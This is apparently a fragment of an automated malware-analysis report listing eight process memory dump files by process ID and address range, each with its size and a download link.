memory/3948-0-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/4160-45-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/4456-66-0x000000001BB10000-0x000000001BB2C000-memory.dmp

Filesize
112KB

Download
memory/4456-69-0x000000001BB90000-0x000000001BBA8000-memory.dmp

Filesize
96KB

Download
memory/4456-71-0x0000000001750000-0x000000000175E000-memory.dmp

Filesize
56KB

Download
memory/4456-67-0x000000001C7D0000-0x000000001C820000-memory.dmp

Filesize
320KB

Download
memory/4456-64-0x0000000001740000-0x000000000174E000-memory.dmp

Filesize
56KB

Download
memory/4456-62-0x0000000000D50000-0x0000000000F2E000-memory.dmp

Filesize
1.9MB

Download